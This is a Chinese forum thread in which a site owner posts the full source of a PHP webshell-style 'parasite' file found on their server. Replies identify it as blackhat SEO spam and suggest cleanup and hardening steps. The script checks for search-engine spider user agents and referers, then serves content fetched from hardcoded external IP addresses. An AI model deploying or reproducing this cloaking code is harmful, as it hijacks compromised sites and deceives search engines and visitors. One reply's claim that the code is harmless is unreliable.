网站好像被挂马了,求帮解决
莫名其妙多了一个文件,查了一下说是webshell木马, 有人帮看下 这个是什么用的, 除了删文件, 还要什么操作吗?<?php
set_time_limit(30);
error_reporting(0);
$tr = "stristr";
$er = $_SERVER;
function httpGet($url) {
$ch = curl_init();
//设置选项,包括URL
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)');
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
//执行并获取HTML文档内容
$output = curl_exec($ch);
//释放curl句柄
curl_close($ch);
//打印获得的数据
return $output;
}
$filename1 = @end(explode('/', $url1));
function set_writeable($file_name)
{
@chmod($file_name, 0755);
}
@chmod(__FILE__, 0755);
set_writeable($filename1);
define('url', $er['REQUEST_URI']);
define('ref', $er['HTTP_REFERER']);
define('ent', $er['HTTP_USER_AGENT']);
define('site', "http://155.159.254.150");
define('road', "?/" .$er['HTTP_HOST'] . url);
define('regs', '@Baidu|Sogou|Yisou|Haosou|Spider|So.com|Sm.cn@i');
define('area', $tr(url, ".xml") or $tr(url, ".doc") or $tr(url, ".pdf") or $tr(url, ".txt") or $tr(url, ".ppt") or $tr(url, ".pptx") or $tr(url, ".xls") or $tr(url, ".csv") or $tr(url, ".shtml") or $tr(url,".tacc")or $tr(url,".ga")or $tr(url,".gq")or $tr(url, ".xlsx") and $tr(url, "?"));
if (area && preg_match(regs, ref)) {
echo file_get_contents('http://155.159.254.180/sb.html');
exit;
}
if (preg_match(regs, ent)) {
if (area) {
echo httpGet(site.road);
exit;
} else {
echo httpGet("http://155.159.254.163/u.php");
ob_flush();
flush();
}
}
?> 这怎么看着像个爬虫,这是恶意上传的,你应该在仔细的查查其他地方,看看有没有其他后门 1、杀毒软件查杀
2、特征码查找文件
3、系统打补丁
4、程序漏洞修补
5、网站安全配置 网站什么系统人家是拿到shell了 找到网站漏洞并加固。。 寄生虫。。做黑猫用的 id554 发表于 2021-2-11 10:00
寄生虫。。做黑猫用的
为什么可以直接上传和修改文件呢 怎么查出漏洞? killong 发表于 2021-2-11 11:40
为什么可以直接上传和修改文件呢 怎么查出漏洞?
查看日志啊 删除病毒代码,以病毒代码@ 为关键词扫描根目录所有文件,并检查关联,检查创建时间,然后分析入侵漏洞,补漏洞。
killong 发表于 2021-2-11 11:40
为什么可以直接上传和修改文件呢 怎么查出漏洞?
可能是弱口令或者旁注,用D盾查杀,然后设置0444 这段代码看完,好像没什么恶意啊!
页:
[1]
2